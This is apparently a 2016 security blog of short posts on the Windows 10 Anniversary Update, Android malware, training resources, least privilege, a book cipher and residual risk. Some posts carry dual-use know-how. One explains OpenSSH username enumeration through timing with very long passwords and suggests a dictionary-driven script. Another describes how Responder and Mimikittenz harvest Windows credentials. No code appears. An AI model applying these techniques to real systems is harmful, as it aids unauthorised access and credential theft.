As of today, 2 August 2016, users will be able to upgrade their Windows 10 devices to the newest version, dubbed the Anniversary Update due to its release being roughly one year from the initial release of the Windows 10 operating system.

The new update provides a lot of new features for users to make life easier, such as new on-screen inking capabilities, the ability to add extensions to the Edge browser, and even the integration of an Ubuntu Linux Bash shell for more advanced users. This update adds a significant amount of security benefits as well, making it the most secure version of the operating system thus far:

  1. Added support for a third-party antivirus program to run in parallel with Windows Defender. Instead of Defender disabling itself when another antivirus program is installed, it will run concurrently in a way that does not affect the other program, acting as an additional layer of defense.
  2. Windows Defender Advanced Threat Protection is a new feature for Windows 10 Enterprise users to detect and respond to advance malicious threats in a corporate environment.
  3. Windows Hello allows you to enable multifactor authentication, allowing to login to your computer with biometrics, or more recently, something like a USB device or your phone.
  4. The Edge browser adds new security features to sandbox Flash and other content, along with reducing the number of Windows subsystems that the browser has access to, limiting the damage an attack can cause.

This is of course in addition to the regular patches and security fixes that are included in the update as well.

Earlier today I was reading about an interesting vulnerability present in the modern versions of OpenSSH. This isn’t a critical vulnerability that will get you root access, but it does provide the first half of the puzzle: the usernames. An SSH server should give no indication of whether or not your username is valid; it should provide the same error response whether the password was incorrect or whether the user does not exist.

Most implementations of OpenSSH follow this principle, and there is not any distinction in why a login attempt failed. Unfortunately, while there is no visual distinction in message, there is one in time delay. Researchers identified that a login attempt with an invalid username takes a shorter amount of time than a login attempt with an invalid password for a valid username. Using this time difference, we can tell whether or not the username actually exists.

The reason for this lies in the encryption algorithms. For invalid usernames, OpenSSH uses a built-in BlowFish algorithm, but valid accounts have SHA-256 or SHA-512 hashes. This is fine with normal-sized passwords, but providing a 25,000 character password makes this difference much more noticeable and measurable. Here is an example script that the researchers wrote and that I tested out on my own SSH server:

OpenSSH Python

As you can see with the times to the right, invalid users (jim, bob, mike, tom, sam) took 4-6 seconds to error, whereas a valid user (rtheory) took 12-13 seconds. Changing this script to read usernames from a dictionary instead of keyboard input would provide a simple (though slow) means of user account enumeration.

MyActivity

Google has recently made available a new service that let’s you very easily see what data they have about you, your viewing habits, your devices, and even your location history. All of this information is in one central viewing area now, called MyActivity, and can be found for your account at: https://myactivity.google.com

This page is unique made based on the account that you login with, and is completely privately generated so that only you have access to it (you cannot query for another user’s information). Right on the front page you will find a surprising amount of information, to include what you searched for and at what time (for any day), ads you may have clicked on, website you visited, Youtube videos you’ve watched, news articles you read, and much more. By default it shows this information chronologically, starting with today, and you can filter the data (or even perform searches through it!) to see if something in particular may be present.

If you click the menu icon, there is a link for “Other Google Activity” as well, which contains even more information about your account. This includes information from your phone, such as contacts, apps, and other data, as well information gained from your phone’s GPS. This is perhaps the most amazing collection of data I found, and the most scary. By visiting the “Location History” section, it will present to you a map of everywhere that Google knows you have been, and is quite accurate. I was surprised that it knew about some of these locations, as they were either from a very long time ago or I thought my GPS feature was turned off.

Even more interesting, though, is the Timeline feature of the location history. You can pick any day (e.g. January 11, 2016) and see a detailed description of where you went and at what times. Google nicely plotted out a map for me of my trip from home to work at precisely 7:36am, along with where I went for lunch from 11:55am-12:28pm, and my return trip from work to home at 5:15pm. On other days, it plotted out my entire errand runs, even pointing out and naming what stores I stopped at along the way. Yet another day, it plotted out my trip across the country I took, even specifically pointing out which Dunkin Donuts I stopped at, and which rest stops I detoured to, with exact times.

Map

With all of this said, Google is providing this to us not just to scare us into realizing how much they know about our daily lives, but to also delete it if we so choose. With each page, you have the option of telling Google to “forget” that specific instance, that specific day, week, month, or even just forget everything about you completely and start fresh. The latter option may impact your browsing experience, but the option is available to you now with the click of a button, and that is an important thing to know.

Pass the Salt

Corporate Windows environments have a difficult challenge when it comes to protecting sensitive information stored in memory. It is almost frightening just how much of your personal information and login credentials are sitting in memory in plaintext, sometimes readable by users without administrative privileges!

One such tool, 1responder.py1, is a simple script that can turn your machine into a rogue authentication server for a myriad of protocols. It works for HTTP(S), MYSQL, SMB, DNS, DHCP, among others. Whenever a targeted machine communicates with your rogue server, attempting to authenticate to it, the credentials it uses are harvested and saved. This makes it very easy to get a list of valid hashes on a Windows domain, and because Windows uses hashes for a large number of operations, cracking them is sometimes not necessary.

A new tool was just recently released as well, called Mimikittenz. If you are familiar with the Mimikatz tool (scraping Windows credentials from RAM in plaintext), you will not have to learn much more for this one. Mimikittenz is essentially a rewrite of Mimikatz into PowerShell, creating an open-source scripted version of the tool that you can customize as desired. Additionally, seeing as it uses built-in PowerShell commands, it provides a mechanism for non-administrator users to extract credentials from RAM as well, making it even more versatile than its parent.

Mimikittenz

This is definitely not the first time seeing PowerShell used for malicious purposes. Since these are just scripts and not compiled programs, they are trivial to get past any antivirus system and other safeguards. If PowerShell is not disabled for your users, be on the look out for malicious scripts like these.

For more information on Responder: https://github.com/SpiderLabs/Responder For more information on Mimikittenz: https://github.com/putterpanda/mimikittenz

The spread of malware on the Android mobile platform seems to be getting more and more common. This week alone there were reports of two major rootkit-type variants that have affected millions of devices each. If you still think that phones do not need the same kind of security and antimalware protections as your home computer, you may want to think again.

The Hummingbad malware is currently up to 10 million infected users worldwide, with 286,000 being in the US. The main targets right now are located in China and it’s vicinity, largely due to China being the likely country of origin. Yingmob, the alleged company responsible for the malware, is reportedly also in some level of control of over 80 million Android devices and sells information associated with accessing them. For Hummingbad, the malware roots the phone in one of numerous methods available to it, which provides it administrative privileges in order to continue exploiting the phone. It will then install other malicious apps that generate ad revenue for Yingmob, potentially generating up to $300,000 per month.

Similarly, Hummer was another form of Android malware, infecting up to 1.2 million devices every day. This repeated the same technique of rooting the phone and installing additional malicious applications. Due to the sheer enormity of daily infections, it is possible that this malware is generating up to $500,000 daily for the attackers.

Hummer Infections

To not be in the list of millions that get infected, be sure to install a reputable antivirus and security solution for your Android device, if you own one. Also make sure to go into your settings and disable authorization for third-party app downloads. Finally, should an application (or even the system itself) ask for permissions, always be sure to examine the request thoroughly and decline it if it does not make logical sense.

To read more about Hummingbad and Hummer:

http://www.techrepublic.com/article/hummingbad-malware-infects-10-million-android-devices-millions-more-at-risk

http://www.techrepublic.com/article/1-2-million-infected-android-malware-hummer-could-be-biggest-trojan-ever

Do you like to learn new skills in cyber security? Do you enjoy learning on your own through books, videos, and online resources? I am very often looking to find the next topic or skillset to spend time on exploring, and over the years I have found a few websites that I could repeatedly rely on for a wide variety of free academics. I have compiled them below along with some bullet-points on why each may be of value to you as they have been to me.

Happy learning!

Open Security Training

  • 29 classes (13 with videos) ranging from beginner to advanced
  • Pick what you want and you can download the lesson in PowerPoint or PDF
  • Most classes with videos include downloadable videos instead of just YouTube links
  • Topics include:
    • Assembly, forensics, and reverse engineering for Android, ARM, Intel x86, and Intel x86-64, reverse engineering malware (from beginner to advanced)
    • Hacking techniques, software exploitation, Windows exploitation
    • Defensive techniques, flow analysis, network hunting
    • Cryptography, cryptology, cryptanalysis

SANS Cyber Aces

  • You can download the handouts/slides to review on your own
  • This is free SANS training pulled from their formal curriculum
  • Topics include Linux and Windows fundamentals, networking and the OSI model, and details into PHP, Bash, and PowerShell

Offensive Security, Metasploit Unleashed

  • Master many of the ins and outs of Metasploit. Don’t think it’s just a “script kiddie” tool; the pros depend on it too. This will give you the knowledge on how to use it for custom and much more advanced attacks.
  • Good for both Metasploit novices and more experienced users
  • From scanning, to exploit development, to scripting, and maintaining access
  • Highly recommended if you want to advance your skillset
  • Click the red box under “MSFU Navigation” to get started

Cybrary

  • These are all video-based academics
  • Registration required, but you get free access to hundreds of hours worth of training videos
  • Offers beginner through advanced courses
  • Topics include crypto, python, exploitation, malware analysis, offensive and defensive techniques

SecurityTube

  • This is like a YouTube website specifically for cyber offense and defense learning
  • Highly recommend checking out the videos under “Megaprimers”
  • Metasploit Framework
  • Exploit Research
  • Windows & Linux Assembly
  • Buffer Overflow
  • Format Strings

Packt Publishing

  • Tons of digital books and videos on an incredible range of cyber security tools, programming languages, and technologies
  • A free and downloadable e-book is given away every day

In the course that I am taking, we are developing a threat modeling process that we can use for our respective organizations. One critical piece of threat modeling is having a listing of credible sources available to you; this list should contain sources that cover information on specific threat trends, vulnerability information, software and system updates, and other news related to security trends and major events. The benefit to this is that you always have a resource to go to when trying to threat model a system.

What I found useful was setting up a feed reader to monitor a variety of websites. Whenever an article is posted on any of the sites, its title and short description is posted to the feed. I use Feedly.com for this due to its ease of use to get started. Here is a listing of the feeds that I am currently watching:

  • CIO Security
  • Nextgov
  • Naked Security
  • SANS Internet Storm Center, InfoCON: green
  • InfoSec Resources
  • Schneier on Security
  • Securelist – Information about Viruses, Hackers and Spam
  • ZDNet security RSS
  • Paul’s Security Weekly
  • Metasploit
  • Room362
  • Security on TechRepublic
  • Darknet – The Darkside
  • Carnal0wnage & Attack Research Blog
  • GDS Security
  • MalwareTech
  • PortSwigger Web Security Blog
  • SANS Penetration Testing
  • US-CERT Alerts
  • Google Online Security Blog
  • Offensive Security
  • Dark Reading
  • DigiNinja
  • GNUCITIZEN
  • Reiners’ Weblog
  • SensePost Blog
  • SkullSecurity
  • TaoSecurity
  • Trustwave SpiderLabs Blog
  • WIRED

Note that not all of these are maintained daily or even weekly, but the total of these resources provides a great central location for the latest news in cyber security. The variety helps to ensure that a rounded and unbiased view is given for a large news item, and also helps makes sure that smaller announcements/discoveries/vulnerabilities appear in the feed as well. I would highly recommend creating your own feed with the sources that are important to you.

What is “least privilege” and why is it important?

I would define least privilege as ensuring that all users, services, and accounts are running with the bare minimum of rights and access needed in order to function. If a particular right is not needed in order to perform a particular function, then you will not be assigned that right.

For example, let’s say you have a safe deposit box at your local bank. You have a key to it, and that key will only unlock on your box. This bank is following the principle of least privilege: you only have access to exactly what you need (in this case, your box). If the bank were NOT following the principle of least privilege, they might have given you a master key, instead. This key can give you access to any box, and they are just trusting that you will only attempt to access what you need (your box).

This is why least privilege is so important. Without it, the user/service/account has more permissions than they need, and they are just simply being trusted not to misuse them. Least privilege ensures that misuse isn’t even a possibility. Seeing as they only have the key to their box, as opposed to the master key, they are extremely limited in the damage they can do (either malicious or accidental) and yet they are still able to access everything they need without problem.

Implementing least privilege can take a lot of work, and that time and effort is probably why many organizations do not have it perfected. It is simply easier to just assign a new user with a broad swath of permissions that you know will work for him/her than to sit down and try to iron out exactly what they do and do not need access to.

In our example, it would be so much easier for the bank to just hand out master keys to everyone; they all get access to what they need, and the bank doesn’t need to spend the time making individual keys for each individual box and somehow keeping track of them all. Laziness is a common reason for not following the principle of least privilege.

Earlier today I was given a book/running key cipher to try to decrypt. I have experimented with dozens of different types of ciphers, but somehow this very basic one slipped past me and I had never heard of it before. It is really quite simple: the sender and receiver of the cryptographic information first agree on a book that they will each use as their key. The book is important, because the cipher utilizes page numbers, line numbers, and word numbers in order to create the secret message. The cipher is formatted as shown here:

x1,y1,z1;x2,y2,z2;x3,y3,z3;… x=page, y=line, z=word

So if you saw 2,7,1;3,2,1 this would mean the message is just two words long. The first word is on page 2, line 7, word 1. The second word is on page 3, line 2, word 1.

Let’s give it a shot. In my example, I’ll use a fairly popular book found on many shelves: The 7 Habits of Highly Effective People by Stephen Covey. Here is the ciphertext; let me know if you were able to decrypt it!

22,1,3; 17,14,12; 128,14,1; 186,7,9; 97,3,7; 256,21,6; 57,3,5; 24,1,10; 301,5,5

What is residual risk and why should an organization understand its importance?

Let’s say your organization has identified a risk. You have gone through the entire risk management process and have implemented the approved controls in order to mitigate this risk. Most of the time, it truly is just “mitigation” of the risk happening, not complete removal of the risk. This means that there is still a small amount of risk left over that the control does not protect against; this is the residual risk.

Residual risk is not always a bad thing; however, it is important for an organization to know that it exists. There should never be the portrayal that a certain control has completely eliminated a specific risk (unless on the rare occassion that is truly the case). Senior leaders within the organization must be aware of this residual risk so that they can make the decision on whether or not to change the control, add another control, or to just accept the risk altogether and move on. The decision to accept the risk can only be made by the leadership, so they must be made aware of it. While usually unlikely, it is still possible for a malicious or otherwise bad event to take place via this residual risk.

Just remember, even after controls have been put in place to protect against a threat, there is usually always still risk that remains! Identify it, and then either accept it or implement additional controls to protect from it.